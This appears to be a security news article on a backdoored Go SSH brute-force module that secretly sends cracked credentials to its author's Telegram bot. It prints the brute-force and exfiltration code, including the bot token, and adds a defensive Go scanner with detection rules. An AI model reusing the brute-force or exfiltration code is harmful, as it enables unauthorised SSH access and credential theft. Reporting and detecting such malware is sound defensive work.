Go module for brute force attacks on SSH steals the credentials it finds
A malicious Go module disguises itself as a brute force tool for SSH, but secretly steals the credentials it finds and transmits them via Telegram.
(Image: JarTee/Shutterstock.com)
- Manuel Masiero
A Go module discovered by the security company Socket attacks the SSH port of random IP addresses, but reports every success not only to the current user, but also to the author of the tool via Telegram. Because the Telegram API is reached over HTTPS, the bot traffic looks like ordinary web requests and can slip past security systems.
The malicious Go module is called golang-random-ip-ssh-bruteforce and can be traced back to an attacker who appeared on GitHub and in the Go module ecosystem under the name IllDieAnyway. Besides the Go malware, his GitHub page hosted other tools such as a port scanner and a brute forcer for the database tool phpMyAdmin, the latter also backdoored. The IllDieAnyway pages on GitHub and the Go modules have since been taken down.
The malicious code in detail
golang-random-ip-ssh-bruteforce continuously generates random IPv4 addresses and scans TCP port 22 in parallel for reachable SSH services. It sets HostKeyCallback: ssh.InsecureIgnoreHostKey(), so the client never verifies the server's host key. On a hit, the malware attempts to authenticate with a small, locally embedded list of user name/password pairs. After the first successful login, golang-random-ip-ssh-bruteforce transmits the IP address of the host and the credentials to a Telegram bot hardcoded in the source code and reports the success to the user. It then terminates itself in order to remain as inconspicuous as possible.
Socket has published an excerpt of the code and commented on it:
// Probe the host on TCP 22. If the port is reachable, launch brute forcing.
func IsOpened(host string) {
	target := fmt.Sprintf("%s:%d", host, 22)
	conn, err := net.DialTimeout("tcp", target, 2*time.Second)
	if err == nil && conn != nil {
		conn.Close()
		go brute(host)
	}
}

// Configure SSH to skip host key verification, then attempt user:pass.
sshConfig := &ssh.ClientConfig{
	User:            user,
	Auth:            []ssh.AuthMethod{ssh.Password(pass)},
	Timeout:         time.Duration(timeout) * time.Second,
	HostKeyCallback: ssh.InsecureIgnoreHostKey(), // Skip server verification.
}
client, err := ssh.Dial("tcp", addr, sshConfig)

// On first success, send stolen credentials to the threat actor's Telegram.
data := addr + ":" + user + ":" + pass + "</code>"
http.Get("https://api[.]telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=<code>" + data)
close(succ) // Signal success and exit.
After the tapped data has been transmitted, the Telegram API responds with "ok": true and a valid message_id for chat 1159678884. The hardcoded exfiltration endpoint is:
https://api.telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884
According to Socket.dev, the bot token 5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY is currently still live. Telegram identifies the bot as ssh_bot with the username @sshZXC_bot. The target chat 1159678884 is a private chat with @io_ping (aka Gett). As long as the bot token and the chat are active, the Go malware sends the first successful login of each run in the format ip:user:pass via @sshZXC_bot to @io_ping.
(Image: Socket.dev)
Staying inconspicuous with an offline word list
The malicious Go module contains a short, static word list and fetches neither updates nor credentials over the network, so it runs silently until the first hit. The word list combines only two usernames – root and admin – with weak and default passwords, for example toor, raspberry, dietpi, alpine, password, qwerty, numeric sequences and role names such as webadmin, webmaster, maintenance, techsupport, marketing or uploader.
(Image: Socket.dev)
Socket generally warns of supply chain attacks when third-party modules are used in your own code. Users should always review such modules carefully, for example for hardcoded remote endpoints in the network, which frequently turn out to be Telegram bots.
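As an added defender-side example (not code from the article or from Socket), the following Go program scans module source text for the two indicators this article describes: a Telegram Bot API URL with an embedded bot token, and SSH host key verification being disabled. The sample input and the bot token in it are constructed placeholders, and the rule names are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one suspicious line in a scanned source file.
type Finding struct {
	Line int
	Rule string
	Text string
}

// Rules modelled on the indicators reported for golang-random-ip-ssh-bruteforce:
// a Telegram Bot API URL carrying a bot token (defanged "[.]" form accepted too)
// and SSH host key verification being switched off.
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"telegram-bot-token", regexp.MustCompile(`api(?:\[\.\]|\.)telegram(?:\[\.\]|\.)org/bot\d+:[A-Za-z0-9_-]{30,}`)},
	{"ssh-insecure-hostkey", regexp.MustCompile(`ssh\.InsecureIgnoreHostKey\(\)`)},
}

// ScanSource returns every line of src that matches one of the rules,
// in file order, with 1-based line numbers.
func ScanSource(src string) []Finding {
	var out []Finding
	for i, line := range strings.Split(src, "\n") {
		for _, r := range rules {
			if r.re.MatchString(line) {
				out = append(out, Finding{Line: i + 1, Rule: r.name, Text: strings.TrimSpace(line)})
			}
		}
	}
	return out
}

// sample is a constructed snippet; the bot token is a placeholder, not a real one.
const sample = `package main
func main() {
	cfg := &ssh.ClientConfig{HostKeyCallback: ssh.InsecureIgnoreHostKey()}
	http.Get("https://api.telegram.org/bot123456789:PLACEHOLDERTOKENxxxxxxxxxxxxxxxxxxxx/sendMessage?chat_id=1")
}`

func main() {
	for _, f := range ScanSource(sample) {
		fmt.Printf("line %d [%s]: %s\n", f.Line, f.Rule, f.Text)
	}
}
```

Run it over the extracted files of a module before importing it; a hit on either rule is reason to read the surrounding code closely.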
(who)